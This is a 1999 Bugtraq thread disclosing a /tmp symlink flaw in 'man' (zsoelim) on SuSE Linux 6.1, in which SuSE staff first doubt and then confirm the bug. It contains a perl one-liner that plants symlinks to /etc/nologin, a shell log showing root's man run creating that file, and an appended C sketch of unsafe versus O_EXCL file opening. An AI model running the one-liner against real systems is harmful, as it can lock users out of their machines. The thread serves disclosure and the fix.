Date: Wed, 2 Jun 1999 11:01:32 +0200
From: Thomas Fischbacher
To: BUGTRAQ@netspace.org
Subject: /tmp symlink problems in SuSE Linux 6.1

I notified SuSE GmbH several weeks ago about this problem, but didn't get
any response, therefore this post to Bugtraq.

With SuSE Linux 6.1 there are still a few programs around which blindly
create files in /tmp regardless of whether a symlink or something similarly
evil already exists in that place. Among these programs are 'man' and
'dvips'.

Though it seems to be impossible by now to overwrite /etc/passwd with a
plain simple /tmp/zman01234aaa symlink (didn't check if the source is
race-condition free, though), one can still create arbitrary files which
do funny things.

Example:

perl -e 'for($i=1000;$i<5000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'

--
regards,
tf@cip.physik.uni-muenchen.de

(o_  Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf
//\  (lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y)
V_/_ (if (= x 0) y (g g (- x 1) (* x y)))) n 1))

-------------------------------------------------------------------------------

Date: Fri, 4 Jun 1999 09:52:36 +0200
From: Thomas Biege
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

Hi,
we at SuSE could not reproduce this problem, neither for man nor for dvips.
Please send us a full list of "maybe" buggy tools, so we could evaluate them.

Bye,
  Thomas

PS: I never saw your email at your mailing lists.

--
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: thomas@suse.de              Function: Security Support & Auditing
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82

-------------------------------------------------------------------------------

Date: Fri, 4 Jun 1999 16:36:46 +0200
From: Thomas Fischbacher
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

> Hi,
> we at SuSE could not reproduce this problem, neither for
> man nor for dvips.

Ok, here is a log of what I just did five minutes ago:
(emacs -- M-x shell, btw.)

brauneck:~ # whoami
root
brauneck:~ # cd /tmp
brauneck:/tmp # cat /etc/SuSE-release
SuSE Linux 6.1 (i386)
VERSION = 6.1
brauneck:/tmp # rpm -q man
man-2.3.10-62
brauneck:/tmp # md5sum /usr/bin/man
b383967ce695352002f077680e375c62  /usr/bin/man
brauneck:/tmp # su tf
tf@brauneck:/tmp > export LS_OPTIONS=''
tf@brauneck:/tmp > export LS_COLORS=''
tf@brauneck:/tmp > ls zman*
ls: zman*: No such file or directory
tf@brauneck:/tmp > /bin/bash -c "echo $$"
6056
tf@brauneck:/tmp > # this gives me a current pid range
tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'
tf@brauneck:/tmp > ls -l /tmp/zman06123aaa
lrwxrwxrwx   1 tf       stud           12 Jun  4 16:28 /tmp/zman06123aaa -> /etc/nologin
tf@brauneck:/tmp > ls -l /etc/nologin
ls: /etc/nologin: No such file or directory
tf@brauneck:/tmp > exit
brauneck:/tmp # man mmap
Reformatting mmap(2), please wait...
WARNING: terminal is not fully functional
MMAP(2)                Linux Programmer's Manual                MMAP(2)

NAME
       mmap, munmap - map or unmap files or devices into memory

SYNOPSIS
       #include
       #include

       #ifdef _POSIX_MAPPED_FILES
       void * mmap(void *start, size_t length, int prot , int flags,
                   int fd, off_t offset);
       int munmap(void *start, size_t length);
       #endif

DESCRIPTION
brauneck:/tmp # ls -la /etc/nologin
-rw-r--r--   1 root     root         4319 Jun  4 16:30 /etc/nologin
brauneck:/tmp # ls /tmp/zman0* | wc -l
    999
brauneck:/tmp # # Note that one link was removed!
brauneck:/tmp #

You see -- the problem definitely is not fiction! Come over to Munich and
see yourself if you want.

> Please send us a full list of "maybe" buggy tools, so we
> could evaluate them.

?

> PS: I never saw your email at your mailing lists.

?

--
regards,
tf@cip.physik.uni-muenchen.de

(o_  Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf
//\  (lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y)
V_/_ (if (= x 0) y (g g (- x 1) (* x y)))) n 1))

-------------------------------------------------------------------------------

Date: Sat, 5 Jun 1999 07:13:28 +0200
From: Thomas Biege
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

On Fri, 4 Jun 1999, Thomas Fischbacher wrote:

> > we at SuSE could not reproduce this problem, neither for
> > man nor for dvips.
>
> Ok, here is a log of what I just did five minutes ago:
> (emacs -- M-x shell, btw.)

[...]

> You see -- the problem definitely is not fiction! Come over to Munich and
> see yourself if you want.

I don't think it's a fiction...

... the fact is, that just old releases of SuSE 6.1 seem to be vulnerable,
the newer releases don't - man uses open(O_EXCL) and drops its privileges.

A customer told me, that the behavior you described just happens when he
opens a big man page for the first time... we will check this as soon as
possible.

> > Please send us a full list of "maybe" buggy tools, so we
> > could evaluate them.
> ?

In your first post to bugtraq you mentioned, that more tools have /tmp
symlink problems... feel free to tell us about them.

(BTW, I strace'd dvips on my SuSE 6.0 and it never touched /tmp.)

Bye,
  Thomas

--
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: thomas@suse.de              Function: Security Support & Auditing
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82

-------------------------------------------------------------------------------

Date: Sat, 5 Jun 1999 22:02:19 +0200
From: Marc Heuse
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

Hi,
we confirmed the link vulnerability in the man package.
The culprit is zsoelim which creates the file without looking left and
right. :-(

All linux distributions using man 2.3.10 should be affected.

A fixed package from us will be available soon.

Greets,
  Marc

--
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: marc@suse.de                Function: Security Support & Auditing
"lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C
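Added illustration, not part of the thread or of the man/zsoelim sources: the blind temp-file open() the thread attributes to zsoelim, beside the O_CREAT|O_EXCL form SuSE says the fixed man uses, exercised against a planted symlink. The function names are made up here, and the link and target live in a private directory created by mkdtemp rather than being the real /tmp/zman06123aaa and /etc/nologin.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Unsafe (the zsoelim pattern): O_CREAT without O_EXCL follows a symlink
 * planted at the predictable name, so a root-run man writes the link's
 * target instead of a fresh temp file. Shown only for contrast. */
int tmp_open_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: with O_CREAT|O_EXCL, open() fails with EEXIST when anything,
 * including a dangling symlink, already sits at the path (the link is not
 * followed); O_NOFOLLOW also refuses a symlink final component on its own. */
int tmp_open_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Demo: plant a symlink at a predictable name inside a private directory
 * (constructed stand-ins for /tmp/zman06123aaa -> /etc/nologin), then check
 * that the safe opener refuses it with EEXIST, leaves the target uncreated,
 * and still creates a name nobody planted. Returns 1 when all three hold. */
int demo_planted_symlink(void)
{
    char dir[] = "/tmp/zman-demo-XXXXXX";   /* constructed sandbox directory */
    char link[64], target[64], fresh[64];
    int ok = 0, fd;

    if (mkdtemp(dir) == NULL) return 0;
    snprintf(link, sizeof link, "%s/zman06123aaa", dir);
    snprintf(target, sizeof target, "%s/nologin", dir);
    snprintf(fresh, sizeof fresh, "%s/zman06124aaa", dir);
    if (symlink(target, link) != 0) goto out;

    fd = tmp_open_safe(link);
    if (fd == -1 && errno == EEXIST && access(target, F_OK) != 0) {
        fd = tmp_open_safe(fresh);          /* unplanted name: must succeed */
        if (fd >= 0) { close(fd); ok = 1; }
    } else if (fd >= 0) {
        close(fd);                          /* should not happen */
    }
out:
    unlink(fresh); unlink(target); unlink(link); rmdir(dir);
    return ok;
}
```

O_EXCL only closes the predictable-name race; dropping root before touching /tmp, which the thread also credits the fixed man with, limits what a bypass could still write.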